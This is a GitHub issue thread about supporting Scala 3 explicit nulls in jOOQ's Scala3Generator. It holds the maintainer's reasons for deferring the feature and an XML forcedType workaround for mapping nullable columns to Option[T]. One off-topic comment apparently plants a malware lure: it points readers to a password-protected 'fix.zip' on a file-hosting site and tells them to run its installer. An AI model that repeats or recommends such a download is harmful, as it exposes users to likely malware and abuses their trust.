### ISSUE TITLE
Support Scala's explicit nulls in Scala3Generator

### ISSUE THREAD

**Issue by lukaseder** [jOOQ/jOOQ#17149]
Scala 3 supports explicit nulls:
https://dotty.epfl.ch/3.0.0/docs/reference/other-new-features/explicit-nulls.html

We should move from our Java enums to Scala enums in the `Scala3Generator`, starting with jOOQ 3.20:

- https://github.com/jOOQ/jOOQ/issues/12180

**Comment by Gross-Igna** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by KuceraMartin** [comment]
Hi, is someone working on this? If not, I'd be happy to pick it up (and I'd appreciate some pointers because I haven't contributed to JOOQ before)

**Comment by lukaseder** [comment]
> Hi, is someone working on this?

I will be, eventually.

> If not, I'd be happy to pick it up (and I'd appreciate some pointers because I haven't contributed to JOOQ before)

Please don't :) See rationale here:
https://github.com/jOOQ/jOOQ/blob/main/CONTRIBUTING.md

TL;DR: This is such a big topic, and I don't want to prioritise this, let alone discuss it right now.

**Comment by lukaseder** [comment]
(but thanks for asking, first)

**Comment by KuceraMartin** [comment]
Hi Lukas, thanks for the quick reply.

In the meantime, is there any workaround that you can think of? I've been playing with `ForcedType` and `Converter` for a bit, but I haven't figured out if it's possible to make a generic rule with them – one that would convert all nullable types to either an `Option[T]` or an explicit `T | Null`. I guess I could introduce many such conversions – one for each type in my database, but that would be pretty tedious.

**Comment by lukaseder** [comment]
> Maybe there is a better way to do it?

The best way is not to do it. Everyone who gets lured into this bikeshed has regretted it, e.g. in the Kotlin ecosystem. See:

- https://github.com/jOOQ/jOOQ/issues/13999

I haven't thought about the `T | Null` approach yet, so I can't give you an answer here yet. I simply don't know about any of the probably 100s of caveats and side effects of doing this in jOOQ's type system.

`Option[T]` can be done easily with forced type. The "generic rule" can be achieved either using programmatic configuration, or you just hard-code all types like this:

```xml
<forcedType>
  <converter>...</converter>
  <userType>Option[String]</userType>
  <includeTypes>(?i:VARCHAR)</includeTypes>
  <nullability>NULL</nullability>
</forcedType>
```

See:
https://www.jooq.org/doc/3.20/manual/code-generation/codegen-advanced/codegen-config-database/codegen-database-forced-types/codegen-database-forced-types-matching/

**Comment by lukaseder** [comment]
> By looking at the stack trace, I found out that it's being called from `DefaultBinding.pgFromString`

Sounds like a bug. Can you provide the complete stack trace, and the query you're running, as well as a sample schema? Please do so in a new issue: https://github.com/jOOQ/jOOQ/issues/new/choose. This issue is about a future feature.

**Comment by KuceraMartin** [comment]
Okay, here is the bug report: https://github.com/jOOQ/jOOQ/issues/17703
